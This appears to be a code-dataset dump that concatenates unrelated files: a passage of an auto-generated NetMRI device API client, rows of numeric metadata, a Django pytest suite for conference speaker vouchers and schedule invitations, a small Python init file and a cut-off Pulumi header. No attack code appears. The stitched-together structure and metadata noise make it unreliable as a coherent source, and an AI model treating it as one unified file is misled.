**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns the default gateway router for this device, based on the following in order of preference: device routing table, device configuration file, device subnet and common conventions.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("gateway_device"), kwargs)
def running_config(self, **kwargs):
"""Returns the ConfigRevision object corresponding to the device's current running configuration.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns the ConfigRevision object corresponding to the device's current running configuration.
:rtype : ConfigRevision
"""
return self.api_request(self._get_method_fullname("running_config"), kwargs)
def saved_config(self, **kwargs):
"""Returns the ConfigRevision object corresponding to the device's current startup configuration.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Returns the ConfigRevision object corresponding to the device's current startup configuration.
:rtype : ConfigRevision
"""
return self.api_request(self._get_method_fullname("saved_config"), kwargs)
def device(self, **kwargs):
"""The general Device object corresponding to this infrastructure device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The general Device object corresponding to this infrastructure device.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
def asset_type(self, **kwargs):
"""The physical/virtual aspect of the device (Virtual Host, Virtual Device, or Physical Device).
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The physical/virtual aspect of the device (Virtual Host, Virtual Device, or Physical Device).
:rtype : String
"""
return self.api_request(self._get_method_fullname("asset_type"), kwargs)
def DeviceCommunitySecure(self, **kwargs):
"""The secured community name
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The secured community name
:rtype : String
"""
return self.api_request(self._get_method_fullname("DeviceCommunitySecure"), kwargs)
def DeviceRank(self, **kwargs):
"""The rank of this device in its virtual brotherhood
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The rank of this device in its virtual brotherhood
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("DeviceRank"), kwargs)
def DeviceFirstOccurrence(self, **kwargs):
"""The first occurrence of this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The first occurrence of this device
:rtype : DateTime
"""
return self.api_request(self._get_method_fullname("DeviceFirstOccurrence"), kwargs)
def virtual_child_count(self, **kwargs):
"""The number of virtual devices hosted on this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The number of virtual devices hosted on this device
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("virtual_child_count"), kwargs)
def device_setting(self, **kwargs):
"""The settings information for this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The settings information for this device
:rtype : DeviceSetting
"""
return self.api_request(self._get_method_fullname("device_setting"), kwargs)
def data_collection_status(self, **kwargs):
"""All information about collection of data for this device
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : All information about collection of data for this device
:rtype : DataCollectionStatus
"""
return self.api_request(self._get_method_fullname("data_collection_status"), kwargs)
def running_config_diff(self, **kwargs):
"""The differences between the current and previous running config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The differences between the current and previous running config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("running_config_diff"), kwargs)
def saved_config_diff(self, **kwargs):
"""The differences between the current and previous saved config.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The differences between the current and previous saved config.
:rtype : String
"""
return self.api_request(self._get_method_fullname("saved_config_diff"), kwargs)
def network_name(self, **kwargs):
"""A Network View assigned to the device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : A Network View assigned to the device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("network_name"), kwargs)
def control_capabilities(self, **kwargs):
"""Capabilities of configuring the interfaces of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capabilities of configuring the interfaces of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("control_capabilities"), kwargs)
def cap_description_ind(self, **kwargs):
"""Capability of changing the description of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of changing the description of an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_description_ind"), kwargs)
def cap_admin_status_ind(self, **kwargs):
"""Capability of changing the Admin Status of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of changing the Admin Status of an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_admin_status_ind"), kwargs)
def cap_vlan_assignment_ind(self, **kwargs):
"""Capability of assigning a regular data VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of assigning a regular data VLAN to an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_vlan_assignment_ind"), kwargs)
def cap_voice_vlan_ind(self, **kwargs):
"""Capability of assigning a voice VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of assigning a voice VLAN to an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_voice_vlan_ind"), kwargs)
def cap_net_provisioning_ind(self, **kwargs):
"""Capability of provisioning a network on an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of provisioning a network on an interface of this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_net_provisioning_ind"), kwargs)
def cap_net_vlan_provisioning_ind(self, **kwargs):
"""Capability of creating a VLAN and provision a netowrk on its virtual interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of creating a VLAN and provision a netowrk on its virtual interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_net_vlan_provisioning_ind"), kwargs)
def cap_net_deprovisioning_ind(self, **kwargs):
"""Capability of de-provisioning a network from this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of de-provisioning a network from this device.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_net_deprovisioning_ind"), kwargs)
def cap_description_na_reason(self, **kwargs):
"""Reason of non ability of changing the description of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of changing the description of an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_description_na_reason"), kwargs)
def cap_admin_status_na_reason(self, **kwargs):
"""Reason of non ability of changing the Admin Status of an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of changing the Admin Status of an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_admin_status_na_reason"), kwargs)
def cap_vlan_assignment_na_reason(self, **kwargs):
"""Reason of non ability of assigning a regular data VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of assigning a regular data VLAN to an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_vlan_assignment_na_reason"), kwargs)
def cap_voice_vlan_na_reason(self, **kwargs):
"""Reason of non ability of assigning a voice VLAN to an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of assigning a voice VLAN to an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_voice_vlan_na_reason"), kwargs)
def cap_net_provisioning_na_reason(self, **kwargs):
"""Reason of non ability of provisioning a network on an interface of this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of provisioning a network on an interface of this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_net_provisioning_na_reason"), kwargs)
def cap_net_vlan_provisioning_na_reason(self, **kwargs):
"""Reason of non ability of creating a VLAN and provision a netowrk on its virtual interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of creating a VLAN and provision a netowrk on its virtual interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_net_vlan_provisioning_na_reason"), kwargs)
def cap_net_deprovisioning_na_reason(self, **kwargs):
"""Reason of non ability of de-provisioning a network from this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Reason of non ability of de-provisioning a network from this device.
:rtype : String
"""
return self.api_request(self._get_method_fullname("cap_net_deprovisioning_na_reason"), kwargs)
def privileged_polling(self, **kwargs):
"""A flag indicating whether to poll the device in privileged mode.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : A flag indicating whether to poll the device in privileged mode.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("privileged_polling"), kwargs)
def rawSysModel(self, **kwargs):
"""Unprocessed Device Model value as returned by SNMP
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Unprocessed Device Model value as returned by SNMP
:rtype : String
"""
return self.api_request(self._get_method_fullname("rawSysModel"), kwargs)
def rawSysVersion(self, **kwargs):
"""Unprocessed Device Version value as returned by SNMP
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Unprocessed Device Version value as returned by SNMP
:rtype : String
"""
return self.api_request(self._get_method_fullname("rawSysVersion"), kwargs)
def rawSysDescr(self, **kwargs):
"""Unprocessed Device Description value as returned by SNMP
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Unprocessed Device Description value as returned by SNMP
:rtype : String
"""
return self.api_request(self._get_method_fullname("rawSysDescr"), kwargs)
| 52.257453 | 1,192 | 0.624686 | 25,143 | 212,113 | 5.16084 | 0.020324 | 0.065968 | 0.042879 | 0.049261 | 0.967062 | 0.963386 | 0.934425 | 0.921524 | 0.916129 | 0.909016 | 0 | 0.002849 | 0.295097 | 212,113 | 4,059 | 1,193 | 52.257453 | 0.864994 | 0.808182 | 0 | 0 | 0 | 0 | 0.100302 | 0.048891 | 0 | 0 | 0 | 0 | 0 | 1 | 0.483871 | false | 0 | 0.010753 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
83edddf06544f3655a948a1f0bf2d22353bad779 | 12,869 | py | Python | backend/schedule/tests/test_admin.py | patrick91/pycon | 9d7e15f540adcf0eaceb61fdbf67206d6aef73ec | [
"MIT"
] | 2 | 2017-07-18T21:51:25.000Z | 2017-12-23T11:08:39.000Z | backend/schedule/tests/test_admin.py | patrick91/pycon | 9d7e15f540adcf0eaceb61fdbf67206d6aef73ec | [
"MIT"
] | 23 | 2017-07-18T20:22:38.000Z | 2018-01-05T05:45:15.000Z | backend/schedule/tests/test_admin.py | patrick91/pycon | 9d7e15f540adcf0eaceb61fdbf67206d6aef73ec | [
"MIT"
] | 2 | 2017-07-18T21:27:33.000Z | 2017-07-18T22:07:03.000Z | from unittest.mock import call
import pytest
from django.utils import timezone
from conferences.models import SpeakerVoucher
from schedule.admin import (
mark_speakers_to_receive_vouchers,
send_schedule_invitation_reminder_to_waiting,
send_schedule_invitation_to_all,
send_schedule_invitation_to_uninvited,
)
from schedule.models import ScheduleItem
pytestmark = pytest.mark.django_db
def test_mark_speakers_to_receive_vouchers(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 2
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-1"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id is None
speaker_voucher_2 = SpeakerVoucher.objects.get(user_id=600)
assert speaker_voucher_2.voucher_code == "SPEAKER-2"
assert speaker_voucher_2.conference_id == conference.id
assert speaker_voucher_2.pretix_voucher_id is None
def test_mark_speakers_to_receive_vouchers_doesnt_work_with_multiple_conferences(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mock_messages = mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
conference_2 = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference_2,
submission=submission_factory(conference=conference_2, speaker_id=600),
)
request = rf.get("/")
mark_speakers_to_receive_vouchers(
None,
request=request,
queryset=ScheduleItem.objects.filter(conference__in=[conference, conference_2]),
)
mock_messages.error.assert_called_once_with(
request, "Please select only one conference"
)
assert SpeakerVoucher.objects.count() == 0
def test_mark_speakers_to_receive_vouchers_only_created_once(
rf,
schedule_item_factory,
conference_factory,
submission_factory,
mocker,
speaker_voucher_factory,
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
)
speaker_voucher_factory(
conference=conference,
user_id=500,
voucher_code="SPEAKER-ABC",
pretix_voucher_id=123,
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 2
# existing one untouched
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-ABC"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id == 123
speaker_voucher_2 = SpeakerVoucher.objects.get(user_id=600)
assert speaker_voucher_2.voucher_code == "SPEAKER-2"
assert speaker_voucher_2.conference_id == conference.id
assert speaker_voucher_2.pretix_voucher_id is None
def test_mark_speakers_to_receive_vouchers_ignores_excluded_speakers(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
exclude_from_voucher_generation=True,
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 1
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-1"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id is None
def test_mark_speakers_to_receive_vouchers_ignores_excluded_speakers_even_when_has_multiple_items(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mocker.patch(
"conferences.models.speaker_voucher.get_random_string", side_effect=["1", "2"]
)
mocker.patch("schedule.admin.messages")
conference = conference_factory(pretix_speaker_voucher_quota_id=123)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=500),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
submission=submission_factory(conference=conference, speaker_id=600),
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
# Same speaker as 2, so 2 user_id 600 is excluded
submission=submission_factory(conference=conference, speaker_id=600),
exclude_from_voucher_generation=True,
)
mark_speakers_to_receive_vouchers(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference),
)
assert SpeakerVoucher.objects.count() == 1
speaker_voucher_1 = SpeakerVoucher.objects.get(user_id=500)
assert speaker_voucher_1.voucher_code == "SPEAKER-1"
assert speaker_voucher_1.conference_id == conference.id
assert speaker_voucher_1.pretix_voucher_id is None
def test_send_schedule_invitation_to_all(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
schedule_item_2 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
send_schedule_invitation_to_all(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
assert mock_send_invitation.call_count == 2
mock_send_invitation.assert_has_calls(
[
call(
schedule_item_1,
is_reminder=False,
),
call(
schedule_item_2,
is_reminder=False,
),
],
any_order=True,
)
schedule_item_1.refresh_from_db()
schedule_item_2.refresh_from_db()
assert schedule_item_1.speaker_invitation_sent_at is not None
assert schedule_item_2.speaker_invitation_sent_at is not None
def test_send_schedule_invitation_to_uninvited(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
send_schedule_invitation_to_uninvited(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
mock_send_invitation.assert_called_once_with(
schedule_item_1,
is_reminder=False,
)
def test_send_schedule_invitation_reminder_to_waiting(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
schedule_item_2 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=None,
)
send_schedule_invitation_reminder_to_waiting(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
mock_send_invitation.assert_called_once_with(
schedule_item_1,
is_reminder=True,
)
schedule_item_2.refresh_from_db()
assert schedule_item_2.speaker_invitation_sent_at is None
def test_send_schedule_invitation_reminder_to_all_waiting(
rf, schedule_item_factory, conference_factory, submission_factory, mocker
):
mock_send_invitation = mocker.patch("schedule.admin.send_schedule_invitation_email")
mocker.patch("schedule.admin.messages")
conference = conference_factory()
schedule_item_1 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
schedule_item_2 = schedule_item_factory(
type=ScheduleItem.TYPES.submission,
conference=conference,
status=ScheduleItem.STATUS.waiting_confirmation,
submission=submission_factory(conference=conference),
speaker_invitation_sent_at=timezone.now(),
)
send_schedule_invitation_reminder_to_waiting(
None,
request=rf.get("/"),
queryset=ScheduleItem.objects.filter(conference=conference).all(),
)
assert mock_send_invitation.call_count == 2
mock_send_invitation.assert_has_calls(
[
call(
schedule_item_1,
is_reminder=True,
),
call(
schedule_item_2,
is_reminder=True,
),
],
any_order=True,
)
| 33.776903 | 98 | 0.728029 | 1,412 | 12,869 | 6.265581 | 0.075071 | 0.128857 | 0.060133 | 0.049395 | 0.927094 | 0.898949 | 0.886402 | 0.853849 | 0.853849 | 0.821182 | 0 | 0.014509 | 0.191312 | 12,869 | 380 | 99 | 33.865789 | 0.835591 | 0.005439 | 0 | 0.716511 | 0 | 0 | 0.059784 | 0.050563 | 0 | 0 | 0 | 0 | 0.102804 | 1 | 0.028037 | false | 0 | 0.018692 | 0 | 0.046729 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7e98dede74dc8ee86ae8d6291d78765794468bc | 85 | py | Python | package/futuremakers/__init__.py | fusionlove/futuremakers | 2b5801e3cc53e090e7e7abebbd23c78a297d572f | [
"Apache-2.0"
] | 3 | 2019-10-03T22:12:50.000Z | 2021-10-07T13:52:35.000Z | package/futuremakers/__init__.py | fusionlove/futuremakers | 2b5801e3cc53e090e7e7abebbd23c78a297d572f | [
"Apache-2.0"
] | 4 | 2019-09-10T09:24:21.000Z | 2019-09-23T13:18:53.000Z | package/futuremakers/__init__.py | fusionlove/futuremakers | 2b5801e3cc53e090e7e7abebbd23c78a297d572f | [
"Apache-2.0"
] | 1 | 2019-10-31T11:25:05.000Z | 2019-10-31T11:25:05.000Z | from .futuremakers import *
from .futuremakers import secret_access_key, access_key
| 21.25 | 55 | 0.835294 | 11 | 85 | 6.181818 | 0.545455 | 0.470588 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 85 | 3 | 56 | 28.333333 | 0.906667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f7f212434db9d9724c309bb05b3e475c6175975f | 23,710 | py | Python | sdk/python/pulumi_aws/sagemaker/device_fleet.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/sagemaker/device_fleet.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
